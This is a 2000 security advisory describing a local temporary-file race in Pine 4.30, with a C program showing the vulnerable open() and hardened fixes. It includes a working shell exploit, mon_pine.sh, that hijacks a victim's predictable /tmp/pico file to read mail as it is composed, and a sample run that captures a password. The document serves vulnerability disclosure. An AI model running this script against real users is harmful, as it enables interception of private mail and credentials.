Title: Pine temporary file hijacking vulnerability
Released by: mat@hacksware.com
Date: 11th December 2000
   Hacksware Bug Report

1. Name: Pine temporary file hijacking vulnerability

2. Release Date: 2000.12.11

3. Affected Application:

   Pine Version 4.30 (possibly other versions as well)

4. Author: mat@hacksware.com

5. Type: Local Race Condition

6. Explanation

 If pine is configured as follows:

  [x]  enable-alternate-editor-cmd
  [x]  enable-alternate-editor-implicitly
  editor                   = /usr/bin/vi

 pine creates its temporary file in /tmp with a name like /tmp/pico.007292, where 007292 is the pid of the running pine process, zero-padded to six digits. /tmp is world-writable and the pid is visible to every local user through ps, so the name is fully predictable. This is the classic temporary file race: a predictable name in a shared directory, created without refusing to follow a symlink that already sits there.

 You can simply symlink that name (/tmp/pico.007292 in this example) to a file that does not exist yet.

 When the victim starts editing a message, the victim's vi follows the symlink and creates the link target. The appearance of that target tells you that the victim is editing.

 Now remove the symlink, create your own ordinary file under the same name and make it writable by the victim. vi saves the message into your file, and you can read the victim's mail as it is written.
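 The following C program is an added illustration, not code from this advisory or from Pine itself. It reproduces the root cause in miniature and shows the fix a developer would apply: it plants a dangling symlink at the predictable name (pid 7292 borrowed from the example in section 8, inside a private directory made with mkdtemp rather than in /tmp itself, so nothing else on the system is touched), then opens that name first the vulnerable way (O_CREAT without O_EXCL, which follows the link and creates the target) and then the hardened way (O_CREAT|O_EXCL|O_NOFOLLOW, which refuses), and finally lets mkstemp() pick an unguessable name. The directory, the .trashcan target and the result struct are assumptions made for the demo.

```c
#define _GNU_SOURCE          /* mkdtemp, mkstemp, O_NOFOLLOW on glibc */
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

#ifndef O_NOFOLLOW
#define O_NOFOLLOW 0         /* assumption: fall back to O_EXCL alone where it is missing */
#endif

/* The predictable name the advisory describes: "<dir>/pico.<pid>",
 * zero-padded exactly like the exploit's printf "/tmp/pico.%.6d". */
static void predictable_name(char *buf, size_t n, const char *dir, int pid)
{
    snprintf(buf, n, "%s/pico.%.6d", dir, pid);
}

/* Vulnerable pattern: create-or-truncate by name.  If an attacker has
 * planted a symlink at 'path', the kernel follows it and the file is
 * created wherever the link points.  Returns 1 if 'target' exists
 * afterwards (the write went through the link), 0 if not, -1 on error. */
static int create_following_links(const char *path, const char *target)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0600);
    if (fd < 0)
        return -1;
    ssize_t n = write(fd, "draft\n", 6);
    (void)n;
    close(fd);
    struct stat st;
    return stat(target, &st) == 0 ? 1 : 0;
}

/* Hardened pattern: O_EXCL makes open() refuse any existing name,
 * including a dangling symlink (POSIX requires EEXIST here), and
 * O_NOFOLLOW refuses to open a symlink at all (ELOOP).  Returns the
 * descriptor, or -errno when the name was already taken. */
static int create_exclusive(const char *path)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    return fd < 0 ? -errno : fd;
}

struct demo_result {
    int unsafe_created_target;  /* 1: the attacker's link target got created */
    int safe_errno;             /* errno from the hardened open, 0 if it succeeded */
    int mkstemp_ok;             /* 1: mkstemp() gave us a private file instead */
};

/* Play both sides inside a private directory made with mkdtemp():
 * plant the attacker's dangling link (the exploit's "ln -s $TRASHCAN
 * $PICO_FILE"), then open the predictable name both ways. */
static int run_demo(struct demo_result *r)
{
    char dir[] = "/tmp/pinedemo.XXXXXX";   /* assumption: a writable /tmp */
    if (mkdtemp(dir) == NULL)
        return -1;

    char victim[256], trashcan[256], tmpl[256];
    predictable_name(victim, sizeof victim, dir, 7292);   /* pid from the advisory's example */
    snprintf(trashcan, sizeof trashcan, "%s/.trashcan", dir);
    snprintf(tmpl, sizeof tmpl, "%s/pico.XXXXXX", dir);

    if (symlink(trashcan, victim) != 0)
        return -1;

    r->unsafe_created_target = create_following_links(victim, trashcan);

    int fd = create_exclusive(victim);
    r->safe_errno = fd < 0 ? -fd : 0;
    if (fd >= 0)
        close(fd);

    /* What the application should do: let libc pick an unguessable name
     * and open it with O_CREAT|O_EXCL, which is what mkstemp() does. */
    int tfd = mkstemp(tmpl);
    r->mkstemp_ok = tfd >= 0;
    if (tfd >= 0) {
        close(tfd);
        unlink(tmpl);
    }

    unlink(trashcan);
    unlink(victim);
    rmdir(dir);
    return 0;
}

int main(void)
{
    struct demo_result r;
    if (run_demo(&r) != 0) {
        perror("demo");
        return 1;
    }
    printf("open(O_CREAT) through the planted link created the target: %d\n",
           r.unsafe_created_target);
    printf("open(O_CREAT|O_EXCL|O_NOFOLLOW) failed with: %s\n",
           r.safe_errno ? strerror(r.safe_errno) : "no error");
    printf("mkstemp() succeeded: %d\n", r.mkstemp_ok);
    return 0;
}
```

 Build with cc -o pinedemo pinedemo.c and run it as an ordinary user. The first line shows the attacker's target being created through the link, the second shows the exclusive open failing (EEXIST on Linux, since the O_EXCL check comes before the O_NOFOLLOW one), and the third shows the proper replacement. Note that modern Linux also mitigates this class at the kernel level when fs.protected_symlinks=1: a symlink in a world-writable sticky directory such as /tmp is followed only if the follower owns the link or the link owner matches the directory owner, which blocks the attacker's /tmp/pico.<pid> link in this scenario. The application-side fix, O_EXCL or mkstemp(), is still the one to apply.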



7. Exploits



--------------------mon_pine.sh start--------------------------------
#!/bin/sh
# Grab local pine messages
# Usage: ./mon_pine.sh <pid of the victim's pine process>
# victim pine must use following settings
#
#  mat@hacksware.com
#  http://hacksware.com
#
# [x]  enable-alternate-editor-cmd
# [x]  enable-alternate-editor-implicitly
# editor                   = /usr/bin/vi
#

PID=$1

# pine names its temporary file after its pid, zero-padded to six digits
PICO_FILE=`printf "/tmp/pico.%.6d" $PID`

# target of our symlink; it does not exist yet and only appears once the
# victim's editor is opened on the temporary file
TRASHCAN=/tmp/.trashcan.`date|sed "s/ //g"`

echo PICO_FILE is $PICO_FILE

# if $PICO_FILE or $TRASHCAN exists (a stale symlink included), remove them
rm -f "$PICO_FILE" "$TRASHCAN"

# plant the dangling symlink at the predictable name
ln -s "$TRASHCAN" "$PICO_FILE"

# wait until the victim's vi follows the link and creates $TRASHCAN
while :
do
 if test -f "$TRASHCAN"
 then
  break
 fi
done

echo Victim is Editing Pine Message

# swap the symlink for a regular file we own that the victim can write to;
# vi now saves the message into our file
rm -f "$PICO_FILE"
echo We replace temporary file
touch "$PICO_FILE"
chmod 777 "$PICO_FILE"

echo "Get the message from "$PICO_FILE
echo "^C to break tailer"
tail -f "$PICO_FILE"
--------------------mon_pine.sh end  --------------------------------



8. Example

[mat@overheaven /tmp]$ ps -ax|grep pine|grep -v grep
 7292 pts/1    S      0:22 pine
[mat@overheaven /tmp]$ sh mon_pine.sh 7292
PICO_FILE is /tmp/pico.007292

... wait for victim to compose mail....

Victim is Editing Pine Message
We replace temporary file
Get the message from /tmp/pico.007292
^C to break tailer

Hello...

Your new password is "greenbee"

Don't let anyone know this...
Thanks..

--

=================================================

|               mat@hacksware.com               |

|             http://hacksware.com              |

=================================================